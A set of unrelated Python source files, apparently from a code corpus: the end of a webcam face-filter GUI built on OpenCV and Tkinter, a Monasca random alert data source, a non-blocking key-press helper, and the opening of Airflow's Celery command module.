    # Clip the overlay so nothing is written outside src (the old loop
    # achieved the same with a per-pixel bounds check).
    h = min(h, rows - x)
    w = min(w, cols - y)
    if h <= 0 or w <= 0:
        return src
    alpha = overlay[:h, :w, 3:4] / 255.0
    src[x:x + h, y:y + w] = (alpha * overlay[:h, :w, :3]
                             + (1 - alpha) * src[x:x + h, y:y + w])
    return src
# Main Program
def cvloop(run_event):
    """Webcam loop: grab frames, draw every enabled SPRITES filter onto the
    frame and push the result into the Tkinter panel.

    Runs on a worker thread until `run_event` is cleared by terminate().

    NOTE: this file is Python 2 code (Tkinter import style); expressions like
    `h/3` below rely on Python 2 integer division and are kept as-is.
    """
    global panelA
    global SPRITES
    global previous
    global smile
    sc = 0  # screenshot counter, used to build unique file names
    cap = cv2.VideoCapture(0)
    face_cascade = cv2.CascadeClassifier('Xml/haarcascade_frontalface_default.xml')
    noseCascade = cv2.CascadeClassifier('Xml/haarcascade_mcs_nose.xml')
    smile_cascade = cv2.CascadeClassifier('Xml/haarcascade_smile.xml')
    while run_event.is_set():  # while the thread is active we loop
        _, img = cap.read()
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        faces = face_cascade.detectMultiScale(img, 1.1, 5)
        for (x, y, w, h) in faces:
            # Crown1 Filter
            if SPRITES[0]:
                crown = cv2.imread('Pics/Crown/crown.png', -1)
                crown_roi_color = img[y-20:y+h/3, x-5:x+w]
                crown = cv2.resize(crown, (w+20, int(h/2.2)), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(crown_roi_color, crown)
            # Crown2 Filter
            if SPRITES[1]:
                crown = cv2.imread('Pics/Crown/crown2.png', -1)
                crown_roi_color = img[y-20:y+h/3, x-5:x+w]
                crown = cv2.resize(crown, (w+20, int(h/2)), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(crown_roi_color, crown)
            # Crown3 Filter
            if SPRITES[2]:
                crown = cv2.imread('Pics/Crown/crown3.png', -1)
                crown_roi_color = img[y-40:y+h+35, x-25:x+w+25]
                crown = cv2.resize(crown, (w+50, int(h/2)), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(crown_roi_color, crown)
            # Glass 1 Filter
            if SPRITES[3]:
                specs_ori = cv2.imread('Pics/Glasses/glass.png', -1)
                glass_symin = int(y + 1.5 * h / 5)
                glass_symax = int(y + 2.5 * h / 5)
                sh_glass = glass_symax+30 - glass_symin
                face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
                specs = cv2.resize(specs_ori, (w, sh_glass), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Glass 2 Filter
            if SPRITES[4]:
                specs_ori = cv2.imread('Pics/Glasses/glass2.png', -1)
                glass_symin = int(y + 1.5 * h / 5)
                glass_symax = int(y + 2.5 * h / 5)
                sh_glass = glass_symax+30 - glass_symin
                face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
                specs = cv2.resize(specs_ori, (w, sh_glass), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Glass 3 Filter
            if SPRITES[5]:
                specs_ori = cv2.imread('Pics/Glasses/glass3.png', -1)
                glass_symin = int(y + 1.5 * h / 5)
                glass_symax = int(y + 2.5 * h / 5)
                sh_glass = glass_symax+30 - glass_symin
                face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
                specs = cv2.resize(specs_ori, (w, sh_glass), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Glass 4 Filter
            if SPRITES[6]:
                specs_ori = cv2.imread('Pics/Glasses/glass4.png', -1)
                glass_symin = int(y + 1.5 * h / 5)
                glass_symax = int(y + 2.5 * h / 5)
                sh_glass = glass_symax+30 - glass_symin
                face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
                specs = cv2.resize(specs_ori, (w, sh_glass), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Hat 1 Filter
            if SPRITES[7]:
                hat = cv2.imread('Pics/Hat/hat1.png', -1)
                face_glass_roi_color = img[y-110:y+10, x-45:x+w+60]
                specs = cv2.resize(hat, (w+90, 120), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Hat 2 Filter
            if SPRITES[8]:
                hat = cv2.imread('Pics/Hat/hat2.png', -1)
                face_glass_roi_color = img[y-150:y, x+8:x+w+10]
                specs = cv2.resize(hat, (w, 150), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Hat 3 Filter
            if SPRITES[9]:
                hat = cv2.imread('Pics/Hat/hat3.png', -1)
                face_glass_roi_color = img[y-130:y+20, x-30:x+w+30]
                specs = cv2.resize(hat, (w+50, 150), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Hat 4 Filter
            if SPRITES[10]:
                hat = cv2.imread('Pics/Hat/hat4.png', -1)
                face_glass_roi_color = img[y-110:y+70, x-10:x+w+20]
                specs = cv2.resize(hat, (w+30, 180), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Hat 5 Filter
            if SPRITES[11]:
                hat = cv2.imread('Pics/Hat/hat5.png', -1)
                face_glass_roi_color = img[y-100:y+30, x-45:x+w+50]
                specs = cv2.resize(hat, (w+80, 130), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Mustache Filter: anchored on a nose detected inside the face ROI.
            if SPRITES[12]:
                imgMustache = cv2.imread('Pics/Mustache/mustache.png', -1)
                orig_mask = imgMustache[:, :, 3]
                orig_mask_inv = cv2.bitwise_not(orig_mask)
                imgMustache = imgMustache[:, :, 0:3]
                origMustacheHeight, origMustacheWidth = imgMustache.shape[:2]
                roi_gray = gray[y:y+h, x:x+w]
                roi_color = img[y:y+h, x:x+w]
                nose = noseCascade.detectMultiScale(roi_gray)
                for (nx, ny, nw, nh) in nose:
                    # Size the mustache relative to the nose and clamp it to
                    # the face ROI.
                    mustacheWidth = 2 * nw
                    mustacheHeight = mustacheWidth * origMustacheHeight / origMustacheWidth
                    x1 = nx - (mustacheWidth/4)
                    x2 = nx + nw + (mustacheWidth/4)
                    y1 = ny + nh - (mustacheHeight/2)
                    y2 = ny + nh + (mustacheHeight/2)
                    if x1 < 0:
                        x1 = 0
                    if y1 < 0:
                        y1 = 0
                    if x2 > w:
                        x2 = w
                    if y2 > h:
                        y2 = h
                    mustacheWidth = x2 - x1
                    mustacheHeight = y2 - y1
                    mustache = cv2.resize(imgMustache, (mustacheWidth, mustacheHeight), interpolation=cv2.INTER_AREA)
                    mask = cv2.resize(orig_mask, (mustacheWidth, mustacheHeight), interpolation=cv2.INTER_AREA)
                    mask_inv = cv2.resize(orig_mask_inv, (mustacheWidth, mustacheHeight), interpolation=cv2.INTER_AREA)
                    roi = roi_color[y1:y2, x1:x2]
                    roi_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)
                    roi_fg = cv2.bitwise_and(mustache, mustache, mask=mask)
                    dst = cv2.add(roi_bg, roi_fg)
                    roi_color[y1:y2, x1:x2] = dst
                    break  # only the first detected nose is used
            # Animal 1 Filter
            if SPRITES[13]:
                hat = cv2.imread('Pics/Animal/dog.png', -1)
                face_glass_roi_color = img[y-20:y+h, x-15:x+w+15]
                specs = cv2.resize(hat, (w+15, int(h/1.1)), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
            # Animal 2 Filter
            if SPRITES[14]:
                hat = cv2.imread('Pics/Animal/cat.png', -1)
                face_glass_roi_color = img[y-20:y+h+15, x-5:x+w+15]
                specs = cv2.resize(hat, (w+15, h), interpolation=cv2.INTER_CUBIC)
                transparentOverlay(face_glass_roi_color, specs)
        # Screen Shot: save the current frame once, then clear the flag so a
        # single button press produces a single file.
        if SPRITES[15]:
            sc = sc+1
            cv2.imwrite('Screenshots/sc(%d).jpg' % sc, img)
            # Bug fix: this used to reset SPRITES[9] (the Hat 3 filter), so
            # the screenshot flag stayed set and a file was written on every
            # frame while Hat 3 was silently switched off.
            SPRITES[15] = 0
        # Smile I/O: when enabled, drive the filter cycle from smile detection.
        if SPRITES[16]:
            smiles = smile_cascade.detectMultiScale(
                gray,
                scaleFactor=1.7,
                minNeighbors=50,
                minSize=(25, 25),
                flags=cv2.CASCADE_SCALE_IMAGE
            )
            for (x, y, w, h) in smiles:
                cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 255), 1)
            if len(smiles) == 0:
                #print "No Smile Detected"
                smile_Detection(0)
            else:
                #print "SMILE : "+str(smiles.shape[0])
                smile_Detection(1)
        # Convert BGR -> RGB and hand the frame over to Tkinter.
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = Image.fromarray(img)
        img = ImageTk.PhotoImage(img)
        panelA.configure(image=img)
        panelA.img = img  # keep a reference so Tk does not garbage-collect it
    cap.release()
#GUI
# GUI: build the main window; cvloop (on a worker thread) feeds frames into panelA.
app = Tk()
app.title("SnapChat")
# Video Feed
panelA = Label(app)
panelA.pack()
# GUI Buttons
#######################################################################################
## Crown Drop Down
crown1=ImageTk.PhotoImage(file="icons/crown1.png")
crown2=ImageTk.PhotoImage(file="icons/crown2.png")
crown3=ImageTk.PhotoImage(file="icons/crown3.png")
mb= Menubutton(app, text="Crowns", relief=RAISED)
# NOTE(review): grid() followed by pack() mixes two geometry managers on the
# same widget; confirm the grid() calls here (and below) are redundant.
mb.grid()
mb.menu = Menu ( mb, tearoff = 0 )
mb["menu"] = mb.menu
# Each checkbutton toggles the matching SPRITES slot via get_sprite().
mb.menu.add_checkbutton ( image=crown1,label="Crown 1", command = lambda: get_sprite(0))
mb.menu.add_checkbutton ( image=crown2,label="Crown 2", command = lambda: get_sprite(1))
mb.menu.add_checkbutton ( image=crown3,label="Crown 3", command = lambda: get_sprite(2))
mb.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Glasses Drop Down
glass1=ImageTk.PhotoImage(file="icons/glass1.png")
glass2=ImageTk.PhotoImage(file="icons/glass2.png")
glass3=ImageTk.PhotoImage(file="icons/glass3.png")
glass4=ImageTk.PhotoImage(file="icons/glass4.png")
mb2= Menubutton(app, text="Glasses", relief=RAISED)
mb2.grid()
mb2.menu = Menu ( mb2, tearoff = 0 )
mb2["menu"] = mb2.menu
mb2.menu.add_checkbutton ( image=glass1,label="Glass 1", command = lambda: get_sprite(3))
mb2.menu.add_checkbutton ( image=glass2,label="Glass 2", command = lambda: get_sprite(4))
mb2.menu.add_checkbutton ( image=glass3,label="Glass 3", command = lambda: get_sprite(5))
mb2.menu.add_checkbutton ( image=glass4,label="Glass 4", command = lambda: get_sprite(6))
mb2.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Hats Drop Down
hat1=ImageTk.PhotoImage(file="icons/hat1.png")
hat2=ImageTk.PhotoImage(file="icons/hat2.png")
hat3=ImageTk.PhotoImage(file="icons/hat3.png")
hat4=ImageTk.PhotoImage(file="icons/hat4.png")
hat5=ImageTk.PhotoImage(file="icons/hat5.png")
mb3= Menubutton(app, text="Hats", relief=RAISED)
mb3.grid()
mb3.menu = Menu ( mb3, tearoff = 0 )
mb3["menu"] = mb3.menu
mb3.menu.add_checkbutton ( image=hat1,label="Hat 1", command = lambda: get_sprite(7))
mb3.menu.add_checkbutton ( image=hat2,label="Hat 2", command = lambda: get_sprite(8))
mb3.menu.add_checkbutton ( image=hat3,label="Hat 3", command = lambda: get_sprite(9))
mb3.menu.add_checkbutton ( image=hat4,label="Hat 4", command = lambda: get_sprite(10))
mb3.menu.add_checkbutton ( image=hat5,label="Hat 5", command = lambda: get_sprite(11))
mb3.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Mustache Drop Down
mustache1=ImageTk.PhotoImage(file="icons/mustache1.png")
mb4= Menubutton(app, text="Mustache", relief=RAISED)
mb4.grid()
mb4.menu = Menu ( mb4, tearoff = 0 )
mb4["menu"] = mb4.menu
mb4.menu.add_checkbutton ( image=mustache1,label="Mustache 1", command = lambda: get_sprite(12))
mb4.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Animal Drop Down
dog=ImageTk.PhotoImage(file="icons/dog.png")
cat=ImageTk.PhotoImage(file="icons/cat.png")
mb5= Menubutton(app, text="Animal", relief=RAISED)
mb5.grid()
mb5.menu = Menu ( mb5, tearoff = 0 )
mb5["menu"] = mb5.menu
mb5.menu.add_checkbutton ( image=dog,label="Dog", command = lambda: get_sprite(13))
mb5.menu.add_checkbutton ( image=cat,label="Cat", command = lambda: get_sprite(14))
mb5.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
# Variable to control which sprite you want to visualize
# (indices 0-14 are filters, 15 is the screenshot trigger, 16 is Smile I/O).
SPRITES = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
# Creates a thread where the magic ocurs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
# Function to close all properly, aka threads and GUI
def terminate():
    """Signal cvloop to stop, give it a moment to exit, then close the window."""
    global app, run_event, action
    run_event.clear()
    time.sleep(1)
    app.destroy()
btn5 = Button(app, text="Exit",fg="red", command =terminate )
btn5.pack(side="left", expand="no", padx="10", pady="10")
btn6 = Button(app, text="Screen Shot",fg="green", command =lambda: get_sprite(15))
btn6.pack(side="left", expand="no", padx="10", pady="10")
btn7 = Button(app, text="Smile I/O",fg="blue", command =lambda: get_sprite(16))
btn7.pack(side="left", expand="no", padx="10", pady="10")
# When the GUI is closed it actives the terminate function
app.protocol("WM_DELETE_WINDOW", terminate)
app.mainloop()
|
randoms.py | #!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import json
import logging
import numpy as np
import random
import six
from six.moves import socketserver
import threading as th
import time
import uuid
import voluptuous
import monasca_analytics.banana.typeck.type_util as type_util
import monasca_analytics.component.params as params
import monasca_analytics.exception.monanas as err
from monasca_analytics.source import base
from monasca_analytics.util import validation_utils as vu
logger = logging.getLogger(__name__)
class RandomSource(base.BaseSource):
    """A randomly generated data source implementation."""

    def __init__(self, _id, _config):
        """Create the source and its backing TCP server.

        :param _id: identifier passed through to BaseSource.
        :param _config: validated configuration dict (see validate_config).
        :raises err.MonanasInitError: when the address is taken or the
            configured model name has no matching generator method.
        """
        super(RandomSource, self).__init__(_id, _config)
        try:
            self._configure_server()
        except IOError:
            raise err.MonanasInitError("Address already in use.")
        except AttributeError:
            raise err.MonanasInitError("Invalid generate or validate method.")

    def _configure_server(self):
        """Creates and configures the Server object

        The server object is configured according to
        the configuration of this source module
        """
        # bind_and_activate=False so allow_reuse_address can be set first.
        self._server = socketserver.ThreadingTCPServer(
            (self._config["params"]["host"],
             self._config["params"]["port"]),
            MonanasTCPHandler, False)
        # Resolve the generator method from the configured model name,
        # e.g. "simple_model" -> self._generate_simple_model.
        self._server.generate = getattr(
            self, "_generate_" +
            self._config["params"]["model"]["name"])
        # self._server.validate = getattr(
        #     source_model, self._config["validate"])
        self._server.allow_reuse_address = True
        self._server.server_bind()
        self._server.server_activate()
        self._server.terminate = False
        self._server.generate_alerts_per_second =\
            self._config["params"]["alerts_per_burst"]
        self._server.generate_idle_time_between_bursts =\
            self._config["params"]["idle_time_between_bursts"]
        # Thread is created here but only started by _start_server().
        self._server_thread = th.Thread(target=self._server.serve_forever)
        self._is_server_running = False

    @staticmethod
    def validate_config(_config):
        """Validate `_config` against the source schema and return it."""
        source_schema = voluptuous.Schema({
            "module": voluptuous.And(six.string_types[0],
                                     vu.NoSpaceCharacter()),
            "params": {
                "host": voluptuous.And(six.string_types[0],
                                       vu.NoSpaceCharacter()),
                "port": int,
                "model": {
                    "name": voluptuous.And(six.string_types[0],
                                           vu.NoSpaceCharacter()),
                    "params": {
                        "origin_types": voluptuous.And([
                            {
                                "origin_type": voluptuous.And(
                                    six.string_types[0],
                                    vu.NoSpaceCharacter()),
                                "weight": voluptuous.And(
                                    voluptuous.Or(int, float),
                                    voluptuous.Range(
                                        min=0, min_included=False)),
                            }
                        ], vu.NotEmptyArray()),
                        voluptuous.Optional("key_causes"): dict
                    }
                },
                "alerts_per_burst": voluptuous.And(
                    int, voluptuous.Range(min=1)),
                "idle_time_between_bursts": voluptuous.And(
                    voluptuous.Or(int, float),
                    voluptuous.Range(min=0, min_included=False))
            }
        }, required=True)
        return source_schema(_config)

    @staticmethod
    def get_default_config():
        """Return a configuration dict that passes validate_config."""
        return {
            "module": RandomSource.__name__,
            "params": {
                "host": "localhost",
                "port": 1010,
                "model": {
                    "name": "my_model_name",
                    "params": {
                        "origin_types": [
                            {
                                "origin_type": "my_origin_type",
                                "weight": 1.0
                            }
                        ],
                    }
                },
                "alerts_per_burst": 1,
                "idle_time_between_bursts": 1.0
            }
        }

    @staticmethod
    def get_params():
        # NOTE(review): 'alert_per_burst' does not match the
        # 'alerts_per_burst' key used by validate_config/get_default_config —
        # confirm which spelling consumers of get_params expect.
        return [
            params.ParamDescriptor('host', type_util.String(), 'localhost'),
            params.ParamDescriptor('port', type_util.Number(), 1010),
            params.ParamDescriptor('model', type_util.Object({
                'name': type_util.String(),
                'params': type_util.Object({
                    'origin_types': type_util.Object(strict_checking=False)
                })
            })),
            params.ParamDescriptor('alert_per_burst', type_util.Number(), 1),
            params.ParamDescriptor('idle_time_between_bursts',
                                   type_util.Number(), 1.0),
        ]

    def _start_server(self):
        """Start the TCP server thread exactly once."""
        if not self._is_server_running:
            self._server_thread.start()
            self._is_server_running = True

    def create_dstream(self, ssc):
        """Dstream object creation

        The _dstream object is created before this source is bound
        to the consumers. It uses a socketTextStream, to read data from
        the ThreadingTCPServer.

        :type ssc: pyspark.streaming.StreamingContext
        :param ssc: Spark Streaming Context
        """
        self._start_server()
        self._dstream = ssc.socketTextStream(
            self._config["params"]["host"],
            self._config["params"]["port"])

    def get_feature_list(self):
        raise NotImplementedError("This method needs to be implemented")

    def terminate_source(self):
        """Terminates the source with a delay

        Terminates the source with a delay to allow the messages
        being sent by the handler to clear up.
        """
        self._server.terminate = True
        time.sleep(1)
        self._server.server_close()
        self._server_thread = None

    def _generate_simple_model(self):
        """Generates an alert based on simple_model."""
        # Timestamps are epoch milliseconds.
        current_time = int(round(time.time() * 1000))
        return {
            "created": current_time,
            "id": str(uuid.uuid4()),
            "origin": str(uuid.uuid4()),
            "origin_type": self._random_origin_type(),
            "data": {},
            "state": "",
            "updated": current_time
        }

    def _random_origin_type(self):
        """Randomizes the origin_type"""
        origin_types = self._config[
            "params"]["model"]["params"]["origin_types"]
        return origin_types[self._weighted_choice(
            [o["weight"] for o in origin_types])]["origin_type"]

    def _weighted_choice(self, weights):
        """Gets an index chosen randomly but weighted from a list of weights"""
        # NOTE(review): implicitly returns None for an empty weights list;
        # the schema's NotEmptyArray() check presumably prevents that case.
        totals = []
        running_total = 0
        for w in weights:
            running_total += w
            totals.append(running_total)
        rnd = random.random() * running_total
        for i, total in enumerate(totals):
            if rnd < total:
                return i
@six.add_metaclass(abc.ABCMeta)
class BaseDataSourceGenerator(object):
    """An interface for random data source generators."""

    @abc.abstractmethod
    def __init__(self, _config):
        """BaseDataSourceGenerator constructor.

        :type _config: dict
        :param _config: Configuration of this source
        """
        self._config = _config
        # Resolve the model-specific generator, e.g. a model named
        # "simple_model" dispatches to self.generate_simple_model.
        model_name = self._config["params"]["model"]["name"]
        self.generate = getattr(self, "generate_" + model_name)

    @abc.abstractmethod
    def is_burst_over(self):
        """Should return true when all the burst alerts have been generated"""
        pass

    def generate_simple_model(self):
        """Generate alert event that are shaped according to the simple model
        """
        now = time.time()
        alert = {
            "data": {},
            "state": "",
        }
        alert["created"] = now
        alert["updated"] = now
        alert["id"] = str(uuid.uuid4())
        alert["origin"] = str(uuid.uuid4())
        alert["origin_type"] = self._pick_next_type()
        return alert

    @abc.abstractmethod
    def _pick_next_type(self):
        """Should return the next type for the simple model generation"""
        pass
class LinearlyDependentDataSourceGenerator(BaseDataSourceGenerator):
    """A data source generator where alerts are linearly dependent

    :raises: exception -- if the causal matrix is cyclic
    """

    def __init__(self, config):
        BaseDataSourceGenerator.__init__(self, config)
        # Acyclic causality model
        config_key_causes = self._config[
            "params"]["model"]["params"]["key_causes"]
        # Create the causal matrix (/graph).
        # Fix: materialize the keys into a list.  This module uses six for
        # py2/py3 compatibility, but on Python 3 dict.keys() returns a view
        # that supports neither indexing nor the item swapping performed
        # during the triangulation below.
        self._features_names = list(config_key_causes.keys())
        n = len(self._features_names)
        self._causal_matrix = np.zeros((n, n), dtype=np.float32)
        # causal_matrix[i, j] == 1  <=>  feature j is listed as a cause of i.
        for i in range(n):
            for j in range(n):
                row = self._features_names[i]
                col = self._features_names[j]
                if col in config_key_causes[row]:
                    self._causal_matrix[i, j] = 1
        # Triangulate the causal matrix: repeatedly move a row with no
        # remaining causes to the front of the untreated sub-matrix; failing
        # to find such a row means the causality graph has a cycle.
        tmp_matrix = np.copy(self._causal_matrix)
        n_t = tmp_matrix.shape[0]
        while n_t != 1:
            for i in range(n_t):
                if np.all(tmp_matrix[i, :] == np.zeros(n_t)):
                    tmp_matrix[[i, 0], :] = tmp_matrix[[0, i], :]
                    tmp_matrix[:, [i, 0]] = tmp_matrix[:, [0, i]]
                    # Mirror the swap in the full matrix and name list
                    # (k = rows already fixed, r = absolute row being moved).
                    k = n - n_t
                    r = i + k
                    self._causal_matrix[
                        [r, k], :] = self._causal_matrix[[k, r], :]
                    self._causal_matrix[
                        :, [r, k]] = self._causal_matrix[:, [k, r]]
                    self._features_names[r], self._features_names[
                        k] = self._features_names[k], self._features_names[r]
                    tmp_matrix = tmp_matrix[1:, 1:]
                    break
                if i == n_t - 1:
                    raise err.MonanasCyclicRandomSourceError
            n_t = tmp_matrix.shape[0]
        # Prepare a zero buffer that stores the random values generated
        # following the causal model.
        self._features_random_value = np.zeros(len(self._features_names))
        # This stack contains the generated values for one burst.
        self._features_stack_emitted = []
        logger.debug(
            "Causality Matrix (RandomSource): {0}".format(
                self._causal_matrix))

    def is_burst_over(self):
        """The burst is over once every stacked feature has been emitted."""
        return len(self._features_stack_emitted) == 0

    def _pick_next_type(self):
        """Pop the next feature name, refilling the stack from the causal
        model whenever it runs empty."""
        while len(self._features_stack_emitted) == 0:
            # Generate more features that follow the dag defined by the
            # causal matrix.
            n = len(self._features_names)
            self._features_random_value = np.random.laplace(size=n)
            for i in range(n):
                self._features_random_value[
                    i] += np.dot(self._causal_matrix,
                                 self._features_random_value)[i]
            self._features_random_value = np.floor(self._features_random_value)
            for i in range(n):
                nb = np.abs(int(self._features_random_value[i]))
                if nb > 0:
                    feature = self._features_names[i]
                    self._features_stack_emitted.extend(
                        [feature for _ in range(nb)])
        return self._features_stack_emitted.pop()
class UncorrelatedDataSourceGenerator(BaseDataSourceGenerator):
    """A data source generator where alert item are not correlated.

    Each item has a unique probability to be generated.
    """

    def __init__(self, config):
        BaseDataSourceGenerator.__init__(self, config)
        # Number of alerts produced in the current burst.
        self.accumulated_alerts = 0
        self._config = config

    def is_burst_over(self):
        """True once `alerts_per_burst` alerts were produced; resets the count."""
        limit = self._config["params"]["alerts_per_burst"]
        finished = self.accumulated_alerts == limit
        if finished:
            self.accumulated_alerts = 0
        return finished

    def _pick_next_type(self):
        """Draw one origin_type at random according to the configured weights."""
        self.accumulated_alerts += 1
        candidates = self._config[
            "params"]["model"]["params"]["origin_types"]
        chosen = UncorrelatedDataSourceGenerator._weighted_choice(
            [entry["weight"] for entry in candidates])
        return candidates[chosen]["origin_type"]

    @staticmethod
    def _weighted_choice(weights):
        """Gets an index chosen randomly but weighted from a list of weights"""
        cumulative = []
        total = 0
        for weight in weights:
            total += weight
            cumulative.append(total)
        threshold = random.random() * total
        for index, bound in enumerate(cumulative):
            if threshold < bound:
                return index
class MonanasTCPHandler(socketserver.BaseRequestHandler):
    """A TCP server handler for the alert generation."""

    def handle(self):
        """Handles the incoming messages."""
        accumulated_alerts = 0
        # Loop until the owning server flips its `terminate` flag.
        while not self.server.terminate:
            alert = self.server.generate()
            try:
                validated_alert = self.server.validate(alert)
            except voluptuous.Invalid:
                logger.warn("Invalid schema for generated alerts.")
            else:
                # Newline-delimited JSON, one alert per line.
                self.request.send(json.dumps(validated_alert) + "\n")
                accumulated_alerts += 1
            time.sleep(self.server.generate_idle_time_between_bursts)
|
key_press.py | '''This module implements non-blocking methods waiting for specific key to
be pressed. This thing is hard to do in Python without external libraries,
so forgive me for any non-working hacks below.
'''
def _windows_key_press(wanted_key, stop_event, received_cb):
    '''Poll stdin on Windows until `wanted_key` is pressed or `stop_event`
    is set; call `received_cb` and return as soon as the key is read.

    @param wanted_key: key to be pressed (in our case "q")
    @type wanted_key: one-letter str
    @param stop_event: indicate to stop reading and return
    @type stop_event: threading.Event
    @param received_cb: called when `wanted_key` was read
    @type received_cb: empty-argument callable
    '''
    import msvcrt
    import sys
    import time

    # Nothing to poll when stdin comes from a file or pipe redirection.
    if not sys.stdin.isatty():
        return
    target = wanted_key.lower()
    while not stop_event.is_set():
        if not msvcrt.kbhit():
            # No key waiting — back off briefly instead of busy-spinning.
            time.sleep(0.5)
            continue
        if msvcrt.getwch().lower() == target:
            received_cb()
            return
def _linux_key_press(wanted_key, stop_event, received_cb):
import select
import sys
import termios
import time
import tty
# skip if input is received from file or pipe redirection
if not sys.stdin.isatty():
return
def is_data():
return select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], [])
wanted_key = wanted_key.lower()
old_settings = termios.tcgetattr(sys.stdin)
try:
tty.setcbreak(sys.stdin.fileno())
while not stop_event.is_set():
if is_data():
c = sys.stdin.read(1)
if c.lower() == wanted_key:
received_cb()
break
else:
time.sleep(0.5)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
# Pick the platform-appropriate implementation: msvcrt only imports on
# Windows, so fall back to the termios-based version everywhere else.
try:
    import msvcrt
    get_key_press = _windows_key_press
except ImportError:
    get_key_press = _linux_key_press
def test_keypress():
    '''Above code is very platform specific and hackish. We'd better test it.
    '''
    import threading
    from six import print_
    from six.moves import input

    stop_event = threading.Event()
    # Mutable cell so the nested callback can record success
    # (py2-compatible alternative to `nonlocal`).
    was_received = [False]

    def received():
        was_received[0] = True

    print_('You have 5 seconds to press "q". Go for it...')
    thread = threading.Thread(target=get_key_press, args=['q', stop_event, received])
    thread.start()
    # Give the user a 5-second window, then tell the poller to stop.
    thread.join(5.0)
    stop_event.set()
    if was_received[0]:
        print_('You have managed to press "q". Congratulations!')
    else:
        print_('You didn\'t press "q". What is wrong with you?!')
    # test that stdin is working as expected
    name = input('What is your name? ')
    print_('Your name is:', name)


if __name__ == '__main__':
    test_keypress()
|
celery_command.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
    """Starts Flower, Celery monitoring tool"""
    options = [
        "flower",
        conf.get('celery', 'BROKER_URL'),
        f"--address={args.hostname}",
        f"--port={args.port}",
    ]
    # Optional flags are appended only when the matching CLI argument is set.
    optional_flags = (
        (args.broker_api, "--broker-api"),
        (args.url_prefix, "--url-prefix"),
        (args.basic_auth, "--basic-auth"),
        (args.flower_conf, "--conf"),
    )
    for value, flag in optional_flags:
        if value:
            options.append(f"{flag}={value}")

    if not args.daemon:
        # Foreground mode: run Flower directly in this process.
        celery_app.start(options)
        return

    # Daemon mode: detach with redirected stdout/stderr and a PID lock file.
    pidfile, stdout, stderr, _ = setup_locations(
        process="flower",
        pid=args.pid,
        stdout=args.stdout,
        stderr=args.stderr,
        log=args.log_file,
    )
    with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
        ctx = daemon.DaemonContext(
            pidfile=TimeoutPIDLockFile(pidfile, -1),
            stdout=stdout,
            stderr=stderr,
        )
        with ctx:
            celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
    """Run the Celery worker, keeping the log-serving subprocess alongside it."""
    log_server = _serve_logs(skip_serve_logs)
    try:
        celery_app.worker_main(options)
    finally:
        # Tear the log server down even if the worker exits with an error.
        if log_server:
            log_server.terminate()
@cli_utils.action_cli
def worker(args):
    """Starts Airflow Celery worker"""
